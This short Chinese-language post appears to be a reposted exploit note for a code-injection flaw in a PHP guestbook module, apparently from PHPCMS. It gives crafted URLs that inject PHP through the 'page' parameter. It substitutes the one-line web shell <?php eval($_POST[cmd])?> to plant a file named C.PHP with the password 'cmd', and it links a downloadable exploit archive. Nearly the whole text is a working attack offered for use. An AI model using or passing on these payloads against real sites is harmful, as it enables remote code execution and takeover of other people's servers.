guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}

phpinfo替换成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
在/guestbook/目录下生成C.PHP用一句话连 ..密码cmd

http://www.dosjj.com//uploadfiles/phpcms_exploit_30717.rar

文章如转载,请注明转载自:http://www.5iadmin.com/post/307.html